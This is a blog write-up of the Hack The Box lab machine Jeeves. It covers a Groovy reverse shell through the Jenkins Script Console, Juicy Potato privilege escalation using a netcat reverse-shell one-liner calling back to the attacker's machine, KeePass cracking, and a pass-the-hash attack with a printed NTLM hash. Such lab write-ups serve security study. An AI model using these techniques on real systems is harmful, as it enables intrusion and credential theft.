Hack The Box — Jeeves

Jeeves is a Medium rated Hack The Box machine and is rated as more challenging than oscp.Here we exploit Jenkins using a groovy reverse shell and privilege escalate using Juicy Potato.

ENUMERATION

Nmap scan shows us that port 80,135,445 and 50000 are open

Port 80 hosts a webpage with ask jeeves, we look at the source code and even directory bruteforce but find nothing useful

However when we use dirsearch on port 50000 we find a hidden directory called /askjeeves .DO NOTE that the wordlist we have to use is directory-list 1.0 and it will take quite some time as well. Using any other wordlist will take forever.

The directory brings us over to this jenkins webpage.In jenkins if we go to >Manage Jenkins ,there is a place called >Script Console where we need to run a groovy script to get a reverse shell.I had previously worked with jenkins in a previous ctf and when it comes to this box,the exploitation method is same as well so you can refer my writeup-https://sparshjazz.medium.com/tryhackme-alfred-1b21aef8bef3

EXPLOITATION

Go to > MANAGE JENKINS > SCRIPT CONSOLE

Read the 1st line.It tells us that we can run Groovy script

You can easily google- groovy script reverse shell and get it in this github repo of payload all the things

We run the groovy script reverse shell and catch it on our netcat listener!

PRIVILEGE ESCALATION

We run quick commands like whoami, whoami /priv to see what privileges we have and systeminfo to find more information about our target machine

As we can see, the hostname is jeeves, the architecture is x64, the target is Windows 10 pro.We can also see the build is 10586 and we have SeImpersonatePrivilege and SeChangeNotifyPrivilege are ENABLED. And thus we know that we can run Juicy Potato exploit.

About Juicy Potato- We use Juicy Potato exploit if the windows build is less than Windows 10 1809 OR less than Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryToken Enabled. Now since the build of our target is less than 1809 and the privileges are enabled as well, we can use it !!! You can refer to this writeup for a detail usage-https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505 (HIGHLY RECOMMENDED)

First we have to transfer the juicy potato exploit to our target machine also with other necessary files.To transfer files, we will use SMB Server which we will host from our kali machine. (make sure that the files you wanna upload to the target are in the /home/kali directory in case you are following my commands) If you are not familiar with this, do some research and it will be clear.Our target does not support wget or certutil for file transfer and trust me SMB server is best for transferring files!!!

In our target windows machine, we make a temp directory within the C:\ folder. and run the command to copy the file hosted by the smb server of our kali machine.The ip will be of our kali machine. and we will be saving it in the C:\temp directory of windows.

NOTE: For any further file transfer to the target machine, i’ll use the same method.The usage is — copy \\kali-ip\filename C:\tmp\filename

(make sure that the file u wanna transfer from your kali machine is in the /home/kali directory) Anyways moving on…

We have transferred JuicyPotato.exe to the target and GetCLSID.ps1 which is a powershell script.This script helps us to find valid CLSID for the juicy potato attack.(download link-https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)

Once GetCLSID.ps1 is download and you have transferred it to the target,we need to run this powershell command

After running this, automatically a directory called Windows_10_Pro will be created and within it there will be a file called CLSID.list which we can read.

Now we need to transfer a reverse shell payload.You can use an exe file or .bat or powershell revershell. However here when i tried to use a exe reverse shell which i made using msfvenom, it didn’t work.Lets use a .bat reverseshell instead.

To do so, first run the command in your kali to locate netcat executable

command — locate nc.exe

Next, copy the nc.exe from your kali to windows as shown below

Now in your windows, make a file called priv.bat which has the following code(This is basically a one liner netcat reverse shell which executes the nc.exe binary which we have transferred)

C:\temp\nc.exe -e cmd.exe kali-ip 9999

REFER TO THIS IMAGE FOR A BETTER UNDERSTANDING

Finally it’s time to run the Juicy Potato exploit.Here -l which is set to port 9999 is our listening port. We have to start a netcat listener on port 9999 before running this exploit. The priv.bat is our revershell and -c is our CLSID

Run it and we will get a shell as SYSTEM

ROOT FLAG

This was the most annoying part of the machine.As Per HackTheBox’s rules, the root flag should always be in a text file in the administrator’s Desktop folder. However if you go to > Administrator>Desktop, you will find a file called hm.txt which tells you to go deeper. After this i spent 30 mins looking for txt or xml or ini files or any useful files using the command:

findstr /si password *.txt *.xml *.ini

However i was unable to find it.After reading a writeup i found out that this was very new to others as well, i got to know that it was something related to Alternate Data Stream and you need to run a command to actually see it

dir /r /a:

Alternate Data Streams (ADS) is an element of NTFS files to hide information.You can show alternate data streams in a directory listing with the /r switch: (FOR MORE INFORMATION, USE GOOGLE)

Some Windows utilities recognize ADS and some don’t. For example, type, the go-to utility for reading text from a file, does not, so I used the more command, which seemed okay with the following:

To get the root flag, we have to run

more < hm.txt:root.txt

[BONUS] — Cracking .kdbx file (keypass) & USING pth-winexe for Pass The Hash Attack

At C:\Users\kohsuke\Documents, I found an interesting file:

Googling the kdbx extension, I discovered that it represents an encrypted data store for a password manager program named KeePass. Figuring that the passwords inside could further my compromise of the box, I downloaded the file and researched the file type more deeply. I learned that the keepass2john utility could extract a password hash from this file that would then be loadable by the hash cracking utility John The Ripper. The process of using keepass2john and John itself to obtain the master password for the KeePass file is shown below.

As indicated by the image, the password for the KeePass file was “moonshine1”. To open the CEH.kdbx data store with this password, I downloaded the portable version of KeePass, executed it, and simply used the >FILE → Open File menu option to load CEH.kdbx. When prompted, I provided the password that John found, which proved sufficient to decrypt the data store and show me many things I wasn’t supposed to see:

NOTE: In order to mannually open the KeePass database file using commandline, we can use kpcli.Refer to this writeup by Rana Khalil-https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/more-challenging-than-oscp/jeeves-writeup-w-o-metasploit

I examined each password individually and discovered that the “Backup stuff” password was an NTLM hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00. I thought that I could use this in a pass-the-hash attack against the JEEVES machine’s Administrator account to gain elevated privileges. There are numerous tools that could aid us in doing this. I chose to use the simple pth-winexe program, as shown below.

CONCLUSION

This was a really interesting box other than the part of finding the root flag which was pretty annoying and ctf like.In this box, we learned that

  • Always directory bruteforce on all web related ports
  • We can get a reverse shell from Jenkins using Groovy Script
  • We use Juicy Potato exploit if the windows build is less than Windows 10 1809 OR less than Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryToken Enabled.
  • In case Juicy Potato exploit doesn’t work, we can try using a .bat reverse shell for the (-p) option or even use a powershell reverse shell.In case CLSID doesn’t work, we can find valid ones using a script like GetCLSID.ps1
  • If we have a kdbx file(keypass) we can crack it using Keepass2john
  • if we find NTLM hash of the windows target, we can use pth-winexe and perform pass the hash attack to get an admin shell.

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The Meh Gatsby

Changing The World

“The moon stays bright when it doesn’t avoid night.”

The Earth Savior Selection

Previously on Attack of the Three-Headed Hydras…

A Tree that tried to be Different

27/365 — Sunrise II

I got my Orange Crunch

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Lame

VulnHub’s Mr. Robot: A Walkthrough

picoCTF write up: vault-door-1

How to get Invite code in Hack The Box